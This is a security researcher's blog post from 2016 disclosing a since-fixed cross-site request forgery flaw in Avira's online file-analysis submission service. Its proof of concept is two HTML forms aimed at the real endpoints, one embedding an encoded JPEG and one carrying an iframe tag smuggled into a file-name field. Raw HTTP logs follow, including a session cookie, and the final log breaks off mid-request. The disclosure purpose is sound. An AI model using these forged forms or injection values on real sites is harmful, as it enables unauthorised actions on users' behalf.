December 20, 2016 lawrenceamer no responses

Avira Analysis submission service- CSRF Vulnerability

Want create site? With Free visual composer you can do it easy.

Cross site request forgery has been discovered in the official avira analysis web application .

The issue allows remote attackers to manipulate client-side browser to web-application requests to execute service functions via non-expired session credentials.

The cross site request forgery vulnerability is located in the modules ” saving file ” and “processing request ”
in the absence of security token to protect these modules from this type of attack, attackers are able to
send unlimited requests for files false/postive submission with out secure parsing by security token,
besides attackers are able to combine to files one responsible to execute saving file on Avira remote
system and the other one is to submit that file with no secure token to it .

Status of Vulnerability : Fixed 
Researcher : Lawrence Amer – Coordinated until fix is done 

POCS:

<html>

  <!– CSRF PoC –  –>

  <body>

    <form action=“https://analysis.avira.com/en/savefiles?bd=1481736069739” method=”POST” enctype=”multipart/form-data”>

      <input type=”hidden” name=”name” value=”p1b3v5lfjk1jc81661s521bh117uu4&#46;jpg” />

      <input type=”hidden” name=”file” value=”ÿØÿà&#0;&#16;JFIF&#0;&#1;&#1;&#0;&#0;&#1;&#0;&#1;&#0;&#0;ÿÛ&#0;&#132;&#0;&#9;&#6;&#7;&#20;&#16;&#18;&#20;&#20;&#15;&#20;&#21;&#20;&#20;&#20;&#20;&#20;&#20;&#21;&#20;&#20;&#20;&#20;&#20;&#20;&#20;&#20;&#20;&#20;&#22;&#23;&#20;&#20;&#20;&#20;&#24;&#28;&#40;&#32;&#24;&#26;&#37;&#28;&#20;&#20;&#33;1&quot;&#37;&#41;&#32;&#46;&#46;&#46;&#23;&#31;383&#44;7&#40;&#45;&#46;&#32;&#1;&#10;&#10;&#10;&#14;&#13;&#14;&#20;&#16;&#16;&#20;&#44;&#28;&#20;&#28;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#44;&#32;&#44;&#44;&#44;&#32;&#44;&#44;&#44;7&#44;&#32;&#44;&#44;ÿÀ&#0;&#17;&#8;&#0;&#168;&#1;&#44;&#3;&#1;&quot;&#0;&#2;&#17;&#1;&#3;&#17;&#1;ÿÄ&#0;&#28;&#0;&#0;&#3;&#0;&#3;&#1;&#1;&#1;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#1;&#2;&#3;&#4;&#7;&#6;&#5;&#8;ÿÄ&#0;&#64;&#16;&#0;&#2;&#1;&#2;&#3;&#5;&#5;&#5;&#5;&#5;&#7;&#5;&#0;&#0;&#0;&#0;&#0;&#1;&#2;&#3;&#17;&#4;&#18;&#33;&#5;&#6;1AQ&#7;aq&#129;&#145;&#19;&quot;2&#161;ðBr&#177;ÁÑ&#20;&#35;Rb&#130;&#21;&#36;CS&#146;áñ3cs&#162;&#163;ÿÄ&#0;&#24;&#1;&#1;&#1;&#1;&#1;&#1;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#1;&#0;&#2;&#3;&#4;ÿÄ&#0;&#28;&#17;&#1;&#1;&#1;&#1;&#0;&#3;&#1;&#1;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#0;&#1;&#17;&#2;&#33;1QA&#18;ÿÚ&#0;&#12;&#3;&#1;&#0;&#2;&#17;&#3;&#17;&#0;&#63;&#0;â&#163;&#16;Î&#174;F1&#2;&#32;c&#16;Ä&#26;&#42;Ä&#162;&#144;&#133;&#164;&#32;&#21;&#22;&#2;&#9;&#141;&#36;&#36;&#2;&#15;&#40;&#154;&#45;2&#91;&#32;V&#1;&#161;2G&#96;&#0;&#16;LV&#40;&#64;R&#22;&#29;&#128;&#138;Eb&#132;&#5;&#13;&#8;&#182;&#137;hÉH&#154;&#46;Âh&#26;Ô1X&#171;&#10;ÀSaX&#171;&#5;&#129;&#173;K&#36;&#161;&#1;H&#20;&#32;&#1;&#36;&#33;&#129;&amp;a&#136;fÜÌ&#16;&#134;&#132;&#24;Ä&#2;&#20;&#134;HÐ&#133;Å&#148;&#140;H&#164;&#33;lH&#4;É&#41;&#5;Ä&#152;&#8;6&#0;&#4;&#13;&#2;&#18;&#24;&#128;&#0;&#4;&#136;&#6;&quot;&#36;&quot;&#132;&#8;&#137;h&#177;4&#5;&#45;&#9;&#162;&#152;&#129;&#164;4&#32;&#22;Ñ&#45;&#1;ÔØL&#187;&#18;Ð&#29;K&amp;ÅØV&#6;&#146;&quot;&#172;&#32;&#36;Ð&#138;b&#2;È&#2;&#25;&#166;&#12;&#16;&#2;&#20;c&#16;È&#24;Ñ&#35;B&#12;&#171;&#146;&#59;&#136;d&#140;&#185;&#10;DÜb&#2;&#41;&#18;&#152;Ä&#24;&#152;Ç&#8;95&#24;&#166;å&amp;&#162;&#146;âÛvIw&#182;I&#159;gàjb&#42;F&#149;&#8;J&#165;I&#124;1&#138;Õ&#247;ôK&#189;è&#142;&#167;&#187;Ý&#145;Á&#40;ËhÕnO&#95;eEÚ&#42;ü&#165;Q&#171;ËúRñg&#165;ÜMÕ&#134;Ï&#160;&#147;ÊëÔIÕ&#159;&#22;ßùqþEóz&#158;&#166;&#156;&#146;ãá&#127;ÈÅé&#185;&#31;&#35;&#9;&#185;&#91;&#58;&#154;J&#24;JNÜêCÚËýU&#27;&#127;&gt;&#161;&#137;Üì&#13;Ei&#96;ðë&#190;4ã&#9;&#91;ïE&amp;&#125;ë5è&#191;&#59;&#19;&#46;&#95;&#94;fK&#154;íþÉ&#40;Í9&#96;g&#42;Så&#10;&#141;Ô&#164;û&#179;&#63;&#126;&gt;7&#151;&#129;ÊvÆÉ&#173;&#132;ªéb&#96;á5&#173;&#158;ªK&#148;&#161;&#37;&#164;&#163;Þ&#143;Ô&#22;&#183;3ào&#126;íÓÚ4&#37;Nv&#140;ÕÝ&#42;&#150;Ö&#156;ì&#189;bø5Íw&#164;3&#166;l&#126;q&#17;&#151;&#21;&#135;&#149;&#41;Î&#157;E&#150;p&#148;&#161;&#37;ÒQm5ê&#140;GF&#5;&#132;R&#17;&#36;Ø&#10;B&#2;&#150;&#137;&#177;&#145;&#146;F&#33;&#138;ÅØM&#25;kP&#32;&#20;ÐX&#14;&#162;Â&#177;V&#16;&#20;&#180;&#32;&#22;&#32;&#190;&#160;Ð&#24;&#134;&#44;&#154;&#0;&#64;&#40;Æ&#33;&#144;&#3;&#176;&#134;&#32;ì&#9;&#13;&#130;&#16;i&#14;Â&#1;&#6;&#0;&#4;&#140;õÝ&#150;ìõ&#95;hAËUF&#19;&#173;nW&#138;Q&#141;ü&#28;Óþ&#147;ÈØõÝ&#150;íXá&#177;ÉTi&#42;ÔåE7ÁM&#184;Ê&#23;ñq&#183;&#139;E&#125;&#41;íÜÛà&#157;&#190;&#190;&#145;µ&#8;Ûóë&#161;ð7&#163;n&lt;&#46;&#10;µu&#27;N&#16;&#247;&#47;ªÏ&apos;&#150;&#23;&#93;&#47;&#37;&#161;Á0&#155;v&#189;&#28;BÅF&#164;&#157;e&#44;Ò&#155;&#147;n&#124;ÜgÖ&#47;&#133;&#184;&#28;äÖ&#183;&#31;&#168;&#179;ô8&#183;k&#27;Ù&#95;ö&#169;ahT&#157;&#58;t&#146;U27&#25;T&#169;&#36;&#164;ï&#37;&#174;T&#156;UºÞ&#247;ÒÝ&#150;&#11;Åyðg&#2;ícgJ&#142;Ò&#171;&#41;&#124;5ã&#10;&#176;&#124;&#159;&#184;&#161;&#37;&#126;ªP&#126;&#168;&#215;&gt;&#215;&#94;&#154;&#187;&#173;&#190;ø&#156;&#13;DÝIÕ&#162;ß&#191;JrrN&lt;Ü&#28;&#159;&#185;&#47;&#13;&#58;&#157;ÿ&#0;&#11;&#137;&#133;jp&#169;Mæ&#133;HÆqk&#156;d&#174;&#159;Ìü&#180;wÞÉg&#41;lº9&#174;í&#58;Ñ&#143;ÝUeeó&#126;&#133;Ô&#28;Ýs&#94;&#215;pj&#150;Ñ&#147;&#138;&#183;µ&#165;N&#171;ûÞõ6ÿ&#0;ù&#167;æx&#179;&#215;ö&#169;&#180;ã&#136;Ú&#21;2j&#168;Â4&#46;&#184;9AÊSô&#148;å&#31;é&lt;&#129;&#169;é&#158;&#189;&#129;&#12;b&#18;&#59;&#0;2D&amp;&#138;&#2;Z&#139;&#10;Å&#180;&amp;&#131;&#10;&#44;&#13;&#21;a4&#24;Ö&#162;Â&#177;v&#19;&#12;&#58;&#134;&#32;&#21;&#96;&#176;5&#168;&#25;&#35;&#2;c&#16;È&#26;&#1;&#33;&#136;0&#4;P&#130;C&#17;W&#20;q&#24;&#174;&#2;ÊÅa&#35;îînÃý&#187;&#19;&#26;R&#147;&#140;2Ê&#164;Ú&#182;l&#144;&#178;&#180;&#123;Û&#146;&#94;d&#159;&#12;&#25;Ô&#182;&#215;e&#145;&#146;Í&#130;&#168;á&#47;àªóEøM&#32;ÇÎþG7Ú&#187;6&#174;&#22;&#163;&#165;&#136;&#131;&#132;&#215;&apos;Ír&#148;&#95;&#9;&#46;ôRê&#179;&#29;Wr&#165;&#95;iìê&#180;q&#138;ôÚöT&#171;Þó&#149;&#185;µö&#156;&#36;&#163;ïsµ&#159;6&#124;Í&#129;Ù&#141;Zx&#136;Ï&#21;&#58;r&#167;NJQ&#140;37QÅÞ&#42;y&#146;Ë&#29;&#21;Ö&#189;&#59;Ï&#31;&#187;ûÝ&#138;ÀÅÃ&#15;Qdm&#191;g8&#169;Âï&#139;&#92;&#215;&#14;M&#29;&#15;&#179;ýö&#173;&#142;&#173;&#58;8&#136;ÓMSu&#33;&#42;q&#148;o&#150;QR&#140;&#148;&#164;õ&#247;â&#215;&#131;1e&#141;x&#175;&#187;&#189;&#93;&#161;RÀU&#167;JP&#149;G&#47;z&#174;V&#147;&#167;MÝ&#41;&#47;â&#149;ÓytÑrº7&#247;&#159;wðû&#95;&#15;&#11;Í&#45;3Ð&#175;&#21;w&#28;é4íö&#161;&#37;k&#174;zpi&#26;&#24;ýÇÂb1&#18;ÄW&#140;êNM7&#23;RJ&#15;&#42;I&#44;ªÚY&#45;&#46;nï6&#37;áp&#21;&#167;&#135;J&#14;&#149;&#9;&#42;J&#42;&#42;0&#178;&#180;m&#27;&#91;ÝÓN&#26;&#6;&#151;&#58;&#165;Ù&#22;&#45;ÎÓ&#171;AS&#190;µ&#19;&#156;&#165;&#151;ª&#166;âµîÍnóîï&#190;ó&#127;dÑ&#165;&#128;À&#37;&#23;ìWï&#27;&#188;éÅ&#182;&#179;eµ&#179;ÊÒy&#187;ïmQÏð&#27;ï&#143;&#163;&#124;&#184;&#154;&#146;Í&#123;ª&#150;ª&#174;ù&#172;&#247;&#183;&#145;óðôkã&#177;&#25;b&#165;Z&#189;i&#93;&#182;ï&#41;&gt;r&#148;&#158;&#137;&#36;&#184;ðI&#27;ËúÎüh0&#61;ÎÞìÃ&#21;&#133;ÂË&#18;çN&#162;&#166;&#179;T&#132;3&apos;&#24;ý&#169;A&#191;&#141;&#46;&#124;&lt;Ï&#10;jXÅ&#148;ÀCB&#0;0B&#96;&#64;&#0;&#137;&#27;&#16;Ø&#137;&#16;2&#132;E&#22;&#12;&#166;HþL&#134;Ã&#14;&#166;Âò&#42;Â&#176;&#22;&#1;&#161;&#12;æèc&#16;&#8;1&#136;hQ&#166;0CHY&#8;h&#18;&#27;&#20;&#44;2Gr&#7;skeí&#26;&#152;j&#145;&#171;&#135;&#155;&#132;ã&#123;5ÑñM&#61;&#26;&#125;&#25;&#168;&#59;&#8;u&#45;ÞíF2yv&#132;2&#182;ÿ&#0;êÓMÃ&#95;ã&#167;w&#37;â&#155;ðG&#179;Ú&#184;&#12;6Ò&#160;&#179;d&#171;Ië&#9;Á&#166;âúÂká&#125;ÞLüô&#143;&#163;&#177;&#182;Ý&#124;&#28;&#179;aª8&#95;â&#143;&#24;OïAèüx&#174;M&#25;&#188;ükúúû&#91;Ó&#184;Õ&#176;yªS&#189;j&#10;íÍ&#47;&#126;&#154;ÿ&#0;&#187;&#30;&#95;yiàiî&#94;ðGgâ&#29;iSuS&#167;&#42;vSQk4&#163;&#44;ËG&#127;&#130;ÖÓ&#137;Ñ7&#91;&#180;&#58;&#24;&#139;SÄZ&#133;We&#171;ýÔß&#15;voá&#125;Òë&#163;a&#189;&#93;&#156;RÄæ&#171;&#133;ËB&#171;&#187;Ëþ&#12;ß&#124;WÀßU&#167;sâ&#91;ùV&#126;Æ&#42;&#93;ªá&#178;ëJº&#150;vþ&#26;mYÔ&#189;&#175;&#159;&#148;t&gt;&gt;óö&#150;&#177;&#20;kQ&#161;A&#168;Ö&#131;&#131;&#157;Y&#36;ã&#22;&#172;òÂ&#23;MëÅËÉ&#158;7&#19;&#187;تu&#189;&#132;&#168;Tu&#95;&#8;Æ&#46;y&#151;&#12;Ñqºqïà&#185;Øö&#27;&#189;Ùej&#150;&#150;6j&#140;&#63;Ë&#131;Sªû&#155;øaÿ&#0;&#177;g0yx&#28;&#30;&#18;u&#166;&#169;Ñ&#132;&#167;9i&#24;Å&#93;&#191;öïà&#142;íÙ&#150;æ&#126;ÁJuk8Ë&#17;U&#37;&#36;&#172;Õ&#40;&#45;&#125;&#154;&#124;ÛvmðÑt&#187;Ó&#150;ÔÙ&#123;&#26;&#46;&#157;&lt;&#185;þÔ&#41;þö&#180;ßIÉ&#189;&lt;&#36;Ò&#215;CÍâ&#123;&#94;&#172;&#167;ýß&#15;N4î&#174;ªÊR&#148;&#146;åxÙAÿ&#0;&#171;Ì&#182;Õ&#146;&#58;&#31;hTñ&#21;6uzx8&#185;É&#172;&#179;&#138;ø&#189;&#139;&#127;&#188;P&#95;jVV&#183;&#27;7ml&#143;ÎGêm&#145;&#180;&#161;&#138;ÃÇ&#17;IÞ&#157;H&#41;&#46;&#23;O&#156;&#93;&#190;ÔZiô&#177;ù&#247;&#180;HR&#91;G&#17;û&#59;&#139;&#139;&#148;&#91;Ëlª&#164;&#161;&#23;U&amp;&#184;ûÎWï&#185;sñtóc&#16;îm&#130;&#184;&#0;X&#144;b&#0;&#36;b&#26;&#11;&#18;&#0;1&#18;&#93;&#46;&gt;&#191;&#131;1È&#168;&#187;p&#19;D&#144;Ð&#140;&#153;&#24;ý&#159;&#135;ª&#12;&#58;Ò&#24;&#128;äìc&#16;Ä&#24;&#0;Ð&#163;L&#162;l&#8;Bì&#59;&#9;1Ü&#64;&#176;XHh&#128;&#176;&#13;&#0;&#135;&#173;Ü&#61;Ð&#91;CÚN&#172;å&#10;P&#247;VL&#185;&#156;ì&#159;&#25;&amp;&#146;I&#174;ZÜÙÛ&#125;&#156;b&#41;&#93;á&#154;ÄC&#166;&#144;&#168;&#187;&#156;&#91;ÊüSò&lt;îÀÛõ&#176;53Ð&#150;&#141;ûôÛ&#247;&amp;º5É&#247;&#173;&#127;&#3;&#185;ì&#124;tq&#20;&#161;V&#157;ÔjB3IñY&#149;ìû&#215;&#3;6ØÔÊãû3pqµÝ&#157;5I&#94;ÎUd&#151;&#164;cy&#124;&#142;&#171;&#185;Û&#6;&#166;&#6;&#150;J&#152;&#153;ÖVÒ&#13;&#37;N&#154;þKÞIyÛ&#185;&#26;&#59;É&#190;&#20;0&#13;ÅÞ&#173;k&apos;ì&#160;ø6&#180;ö&#146;û&#11;&#135;WÜs&#13;áß&#12;N6ê&#164;òR&#127;áS&#188;aoæ&#124;gç&#167;r&#15;5x&#142;å&#179;vµ&#10;Ó&#156;&#40;V&#167;Rpø&#163;&#25;&#169;5éÈó&#123;ÿ&#0;&#177;ö&#134;&quot;&#45;àë&#94;&#149;&#189;ì&lt;&#45;Jrïö&#151;&#247;ïü&#45;&#175;3&#139;ákÊ&#148;ã&#58;Rp&#156;&#93;ã&#40;&#183;&#25;E&#247;4u&#29;Òí9IÆ&#158;Ñ&#180;&#94;&#137;b&#18;&#180;&#95;þX&#165;î&#191;æZuH&#175;8&#165;&#215;&#46;Äa&#165;JN&#21;&#33;&#42;s&#143;&#24;J&#46;2&#94;1f3ô&#166;ÒÙXlm4&#177;&#20;&#169;Õ&#139;ødø&#164;ùÂkU&#167;Fx&#189;&#167;Ù&#13;&#25;&apos;&#44;5yÓÑû&#149;&#18;&#169;&#20;õ&#178;OF&#151;&#13;&#93;ù&#140;è&#94;&#92;&#154;&#150;&#46;&#164;&quot;ã&#10;&#149;&#35;&#25;k&#40;Ær&#140;díkÊ&#41;Ùèa&#138;кôe&#9;J&#19;Ye&#9;8Ê&#47;&#138;&#148;&#93;&#164;&#188;&#154;h&#155;&#27;b&#129;&#166;&#22;&#30;Wa&#9;&#176;&#153;V&#19;DJÁa&#164;7&#30;&#160;&#146;1&#20;&#150;&#132;&#146;&#5;&#184;xú&#10;Ý&#5;&#32;lÉ&#147;&#161;S&#165;ø&#47;À&#177;k&#23;&#17;û&#23;Ó&#215;B&#172;ù&#16;Ñ&#45;h&#140;C8&#61;&#6;2QHA&#130;&#0;&#32;&#160;&#4;ÀA&#168;ô&#29;Ç&#25;&#13;&#136;&#36;&#93;&#136;k&#160;&amp;&#33;&#146;Â&#184;&#148;&#132;Ø&#166;ÆΪÕaMÎ4Ôä&#162;ç&#47;&#134;&#41;óúçc&#187;b&#171;ÐÀa&#175;&#47;v&#149;&#24;&#40;Å&#95;YeIF&#32;&#172;&#158;&#136;àtÚM&#93;&#93;s&gt;&#133;u&#158;&#41;tøz&#47;&#14;&#134;l2µ&#182;&#142;6UêÔ&#171;Sâ&#169;&apos;&apos;Ý&#126;&#9;w&#37;eäk&#136;f&#153;&#166;&#0;&#2;&#30;&#175;r7Ú&#166;Ï&#146;&#132;ïS&#12;Þ&#180;øÊ&#157;Þ&#178;&#165;Ó&#190;&lt;&#31;sÔí&#91;3oa&#32;&#180;&#169;bhÎúéR&#23;&#215;ù&#91;º&#124;4&#63;5Â&#13;&#180;&#150;&#173;ð7&#63;&#179;&#95;6&#191;&#19;7&#153;Z&#157;&#58;&#127;kû&#159;oïØu&#155;D&#177;1&#92;&#173;&#164;kiÇK&#41;t&#180;&#95;Vrw&#35;ìá6&#149;l&quot;ýÎ&quot;&#172;V&#171;ÙÆoÙÉt&#149;7xµâ&#143;&#136;þ&#172;&#172;&#188;&#151;&#33;å&#158;&#176;&#92;ºjïÉ&#146;&#161;ÔÉ&#25;&#37;Á&#26;e&#140;&#23;34&#41;æMôùß&#130;1&#169;Û&#130;D&#145;r&#173;u&#165;Ì&#138;&#162;&#191;&#4;&#136;&#169;w&#169;&#36;ä&#124;&#63;ØÉ&#24;ëkß&#149;&#146;f4ÁH&#162;Tù&#125;pÐ&#155;&#25;ÛK&#138;&#189;õ&#92;µdNk&#146;&#178;õüE&#33;peEéóô&#28;gÖÚw&#25;&#168;J&#45;ê&#151;&#14;þ&lt;þW&#32;Õ70Éå0º&#177;&#191;&#187;&#21;çwù&#159;B&#132;ÞUkp&#92;&#187;&#137;&lt;ÐÄ&#7;&#157;ê2&#145;&#40;b&#20;&#152;&#8;&#8;&#26;&#24;&#144;Ä&#29;ÊL&#144;&#20;&#171;&#141;1&quot;&#154;B&#9;&#177;&#33;&#176;&#32;&#168;FæìdjS&#157;&#134;ê&#146;&#93;Z&#92;&#215;&#161;&#132;Ë&#26;ÝG&#32;1&#12;&amp;Jt&#155;ýJ&#133;5ÌÈêØ&#131;&#61;&#8;&#168;ðõ6&#21;d&#147;&#185;ó&#29;wËC&#30;gÌ&#177;k&#61;Yçmüº&#35;&#21;Ê&#167;&#126;&#31;Z&#146;i&#146;&#1;&#142;1&#36;Ë&#23;h&#174;&#247;&#127;N&#31;&#59;ú&#24;d&#172;f&#173;&#29;&#21;&#154;&#124;4çõ&#161;&#138;këÌ&#146;F&#152;&#138;&#167;&#27;&#189;t&#36;É&#61;&#18;ïâM1Îy&#130;kO&#175;&#144;&#134;xE&#187;7wã&#123;&#191;&#3;ZkVfÃ&#187;&#190;nÚ&#153;&#171;RK&#91;sëã&#175;&#2;MHEs&#127;&#169;&#150;&#133;&apos;&#123;&#167;n&#131;ÒIuñ&#95;&#161;&#158;3Vãf&#184;sàKXjJ&#95;eY&gt;VM&#27;8&#124;BQ&#179;ü&#3;Ú&amp;&#172;í&#167;&#7;&#174;&#189;Ì&#140;Ùt&#215;ÖÂ&#31;&#0;&#4;3Êõ&#152;&#8;b&#12;b&#24;&#160;&#134;&#33;&#144;PÑ&#35;B&#20;&#13;&#147;q&#136;R&#2;Gq&#6;&#0;&#8;&#130;&#146;&#41;2&#6;&#41;jab&#16;&quot;&#7;&#96;H&#46;&#8;S55ÇËëð&#33;&#142;&#15;&#136;&#173;ßadÐå&#163;Ó&#151;&#63;&#2;&#169;Ï&#47;Í&#17;&#127;&#63;&#18;DÙS&#92;&#61;&#10;&#167;4&#184;&#174;&#127;H&#153;ñmp&#185;&#33;&#40;hU&#40;hÚðõúdIòè&#13;éo&#63;1Fã&#215;õcÏÝë&#175;Ë&#129;&#0;Iµ&#135;&#172;Ü&#151;à&#172;&#180;ò3beu&#167;&#47;ÈÐ&#131;ÕXÝ&#130;&#187;V&#191;&#91;7ÜBµ&#27;ä&#40;ÊÅVãéÜBW&quot;&#191;hR&#174;ú&#146;án&#36;&#144;&#124;Ñ&#128;&#30;g&#168;&#13;&#0;&#10;&#5;&#8;&#4;&#24;Ð&#128;&#130;&#128;&#0;A&#161;&#128;&#8;&#3;&#0;&#16;&#6;&#0;HÀ&#0;A&#140;&#0;A&#165;&#160;&#32;&#2;&#12;&#144;&#145;6&#215;P&#1;&#1;&#190;&#130;&#184;&#1;&#35;&#184;ã&#32;&#127;Â&#0;&#36;&#180;&#151;&#30;&#156;&#185;ÿ&#0;Á&#28;&#64;&#9;&#21;&#129;&#32;&#2;K&#167;NïKy&#187;&#27;x&#123;x5ËÃ&#136;&#0;&#138;&#42;Ó&#141;øÛ&#159;&#147;0Q&#138;ç&#123;uÓÈ&#0;&#147;f&#148;&#23;&#21;&#126;&#29;ß&#93;&#7;&#26;1&#142;&#141;ëâ&#191;&#64;&#1;&#15;ÿÙ” />

      <input type=”submit” value=”Submit form” />

    </form>

  </body>

</html>

2. Attacker then able to submit the prevoiuse file .

<html>

  <!– CSRF PoC –  –>

  <body>

    <form action=“https://analysis.avira.com/en/processrequest” method=”POST”>

      <input type=”hidden” name=”data&#91;0&#93;&#91;name&#93;” value=”SubmitForm&#91;bd&#93;” />

      <input type=”hidden” name=”data&#91;0&#93;&#91;value&#93;” value=”1481736069739″ />

      <input type=”hidden” name=”data&#91;1&#93;&#91;name&#93;” value=”SubmitForm&#91;uploaderstatus&#93;” />

      <input type=”hidden” name=”data&#91;1&#93;&#91;value&#93;” value=”100″ />

      <input type=”hidden” name=”data&#91;2&#93;&#91;name&#93;” value=”SubmitForm&#91;uploadercount&#93;” />

      <input type=”hidden” name=”data&#91;2&#93;&#91;value&#93;” value=”1″ />

      <input type=”hidden” name=”data&#91;3&#93;&#91;name&#93;” value=”SubmitForm&#91;name&#93;” />

      <input type=”hidden” name=”data&#91;3&#93;&#91;value&#93;” value=”PLUSE” />

      <input type=”hidden” name=”data&#91;4&#93;&#91;name&#93;” value=”SubmitForm&#91;email&#93;” />

      <input type=”hidden” name=”data&#91;4&#93;&#91;value&#93;” value=”zeroattck&#64;gmail&#46;com” />

      <input type=”hidden” name=”data&#91;5&#93;&#91;name&#93;” value=”SubmitForm&#91;filetype&#93;” />

      <input type=”hidden” name=”data&#91;5&#93;&#91;value&#93;” value=”sp” />

      <input type=”hidden” name=”data&#91;6&#93;&#91;name&#93;” value=”SubmitForm&#91;filetype&#93;” />

      <input type=”hidden” name=”data&#91;6&#93;&#91;value&#93;” value=”sp” />

      <input type=”hidden” name=”data&#91;7&#93;&#91;name&#93;” value=”SubmitForm&#91;url&#93;” />

      <input type=”hidden” name=”data&#91;7&#93;&#91;value&#93;” value=”” />

      <input type=”hidden” name=”data&#91;8&#93;&#91;name&#93;” value=”uploader&#95;0&#95;tmpname” />

      <input type=”hidden” name=”data&#91;8&#93;&#91;value&#93;” value=”p1b3v5lfjk1jc81661s521bh117uu4&#46;jpg” />

      <input type=”hidden” name=”data&#91;9&#93;&#91;name&#93;” value=”uploader&#95;0&#95;name” />

      <input type=”hidden” name=”data&#91;9&#93;&#91;value&#93;” value=”&#37;22&#37;3E&#37;3Ciframe&#37;20src&#37;3D&#37;22x&#37;22&#46;jpg” />

      <input type=”hidden” name=”data&#91;10&#93;&#91;name&#93;” value=”uploader&#95;0&#95;status” />

      <input type=”hidden” name=”data&#91;10&#93;&#91;value&#93;” value=”done” />

      <input type=”hidden” name=”data&#91;11&#93;&#91;name&#93;” value=”uploader&#95;count” />

      <input type=”hidden” name=”data&#91;11&#93;&#91;value&#93;” value=”1″ />

      <input type=”submit” value=”Submit form” />

    </form>

  </body>

</html>

POC Modules Logs
——————————————–

POST /en/savefiles?bd=1481736069739 HTTP/1.1

Host: analysis.avira.com

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://analysis.avira.com/en/submit

Content-Length: 4126

Content-Type: multipart/form-data; boundary=—————————19078961943407014171212039114

Cookie: language=en; country=LB; avr_pp=%7B%22937%22%3A%7B%22ttl%22%3A%221459436400%22%2C%22prm%22%3A%22ab_test_price_old%22%7D%7D; passthrough=%5B%5D; permpassthrough=%5B%5D; av_cid=q1ZKzkxRslJKjze1MDU0T0xJNE9JMzFR0lEqXDBL5JXm5NQCXDA%3D; _ga=GA1.2.1506649292.1481734894; mp_ecc589d95be3afef8944df256928b232_mixpanel=%7B%22distinct_id%22%3A%20%22158fe4841793b-0aee81116285a7-70202358-100200-158fe48417acb%22%2C%22__alias%22%3A%20%2258517ada7df44%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%7D; mp_mixpanel__c=0; s_cc=true; s_fid=3E95217B0B811A67-0EF329C9AA9D0C19; s_sq=%5B%5BB%5D%5D; PHPSESSID=huoubi7qa8c88omful5va5o061

Connection: keep-alive

 

—————————–19078961943407014171212039114

Content-Disposition: form-data; name=”name”

 

p1b3v5lfjk1jc81661s521bh117uu4.jpg

—————————–19078961943407014171212039114

Content-Disposition: form-data; name=”file”; filename=””><iframe src=”x”.jpg”

Content-Type: image/jpeg
Øÿà

RESPONSE

=============

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 14 Dec 2016 17:32:19 GMT

Content-Type: text/html

Connection: keep-alive

Content-Security-Policy: style-src ‘unsafe-inline’ https:;

X-Content-Type-Options: nosniff

X-XSS-Protection: 0

x-frame-options: sameorigin

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Wed, 14 Dec 2016 17:32:19 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Pragma: no-cache

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 113

 

{“jsonrpc” : “2.0”, “result” : null, “id” : “id”, “cleanFileName” : “&quot;&gt;&lt;iframe src=&quot;x&quot;.jpg”}

POC LOGS

==================

POST /en/processrequest HTTP/1.1

Host: analysis.avira.com

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: https://analysis.avira.com/en/submit

Content-Length: 951

Cookie: language=en; country=LB; avr_pp=%7B%22937%22%3A%7B%22ttl%22%3A%221459436400%22%2C%22prm%22%3A%22ab_test_price_old%22%7D%7D; passthrough=%5B%5D; permpassthrough=%5B%5D; av_cid=q1ZKzkxRslJKjze1MDU0T0xJNE9JMzFR0lEqXDBL5JXm5NQCXDA%3D; _ga=GA1.2.1506649292.1481734894; mp_ecc589d95be3afef8944df256928b232_mixpanel=%7B%22distinct_id%22%3A%20%22158fe4841793b-0aee81116285a7-70202358-100200-158fe48417acb%22%2C%22__alias%22%3A%20%2258517ada7df44%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%7D; mp_mixpanel__c=0; s_cc=true; s_fid=3E95217B0B811A67-0EF329C9AA9D0C19; s_sq=%5B%5BB%5D%5D; PHPSESSID=huoubi7qa8c88omful5va5o061

Connection: keep-alive

 

data%5B0%5D%5Bname%5D=SubmitForm%5Bbd%5D&data%5B0%5D%5Bvalue%5D=1481736069739&data%5B1%5D%5Bname%5D=SubmitForm%5Buploaderstatus%5D&data%5B1%5D%5Bvalue%5D=100&data%5B2%5D%5Bname%5D=SubmitForm%5Buploadercount%5D&data%5B2%5D%5Bvalue%5D=1&data%5B3%5D%5Bname%5D=SubmitForm%5Bname%5D&data%5B3%5D%5Bvalue%5D=PLUSE&data%5B4%5D%5Bname%5D=SubmitForm%5Bemail%5D&data%5B4%5D%5Bvalue%5D=zeroattck%40gmail.com&data%5B5%5D%5Bname%5D=SubmitForm%5Bfiletype%5D&data%5B5%5D%5Bvalue%5D=sp&data%5B6%5D%5Bname%5D=SubmitForm%5Bfiletype%5D&data%5B6%5D%5Bvalue%5D=sp&data%5B7%5D%5Bname%5D=SubmitForm%5Burl%5D&data%5B7%5D%5Bvalue%5D=&data%5B8%5D%5Bname%5D=uploader_0_tmpname&data%5B8%5D%5Bvalue%5D=p1b3v5lfjk1jc81661s521bh117uu4.jpg&data%5B9%5D%5Bname%5D=uploader_0_name&data%5B9%5D%5Bvalue%5D=%2522%253E%253Ciframe%2520src%253D%2522x%2522.jpg&data%5B10%5D%5Bname%5D=uploader_